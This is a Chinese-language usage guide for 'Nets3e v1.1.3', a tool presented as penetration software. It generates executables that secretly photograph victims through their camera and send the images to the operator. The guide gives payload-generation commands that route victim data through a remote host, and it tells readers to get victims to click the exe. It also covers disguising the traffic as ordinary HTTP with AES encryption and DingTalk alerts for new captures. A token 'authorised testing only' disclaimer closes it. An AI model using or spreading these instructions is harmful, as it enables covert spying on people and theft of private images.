Nets3e v1.1.3(偷拍照片,直接查看照片,钉钉信息提示)
字数 1084 2025-08-10 20:35:59
Nets3e v1.1.3 渗透测试工具使用指南
工具概述
Nets3e 是一款渗透测试工具,当前版本为 v1.1.3,具有以下核心功能:
- 偷拍受害者照片并直接查看
- 钉钉信息实时推送通知
- 支持公网和局域网攻击
- 数据传输加密功能
版本更新历史
v1.1.3 更新
- 修复受害者无法获取公网IP的问题
- 新增钉钉实时监控推送功能
v1.1.2 更新
- 废弃Base64编码传输
- 新增AES加密选项
- 将数据包混淆在正常HTTP请求中
- 加密传输增加中间人截获破解难度
v1.1.1 更新
- 代码优化瘦身
- 提高稳定性
- 新增debug内网最短路径攻击功能(用于测试主要功能是否存在异常)
基础使用
python3 Nets3e.py -h
攻击模式
公网攻击示例
- 生成Payload:
python3 Nets3e.py -rh http://xxxx.com:11111 -g
- 让受害者点击生成的
Nets3eClient_release.exe
局域网攻击示例
- 生成Payload:
python3 Nets3e.py -g
- 让受害者点击生成的
Nets3eClient_debug.exe
Payload 参数说明
生成前参数
-dd:开启消息实时推送-lp:设置本机监听端口(默认10032)-lh:设置本机监听IP(默认当前网卡IP)-rh:进行流量转发的远程主机,协议是TCP但要改成HTTP进行生成-g:生成PAYLOAD,如果已经生成payload则无需使用该参数-salt xxx:将受害者的数据传输前进行AES加密防止中间人嗅探
生成后文件说明
Nets3eClient_debug.exe:局域网攻击的调试版本,主要用于测试内部网络受害者数据是否能够到达本地机器Nets3eClient_release.exe:公网攻击的发布版本,主要用于攻击公网用户
配置文件说明
GETIP.conf
配置受害者点击exe后从哪个接口获取公网IP,如果API接口不能使用可手动更换:
METHOD:请求方式GETIP:获取公网IP接口
DingTalk.conf
配置工具启动后将监视消息实时推送至钉钉:
TOKEN:钉钉群机器人TOKENSECRET:钉钉群机器人签名
钉钉推送示例
python3 Nets3e.py -dd
受害者点击debug版本exe后:
- 自动保存照片至
./IP_Photo/受害者IP.png - 通过钉钉推送模块API发送通知
注意事项
- 钉钉推送模块已分离出单独API,可参考使用
- 工具涉及黑客、网络安全、web安全、数据安全和内网渗透领域
- 使用时请遵守当地法律法规,仅用于授权测试
项目地址
GitHub: https://github.com/MartinxMax/Nets3e/tree/Nets3e_V1.1.3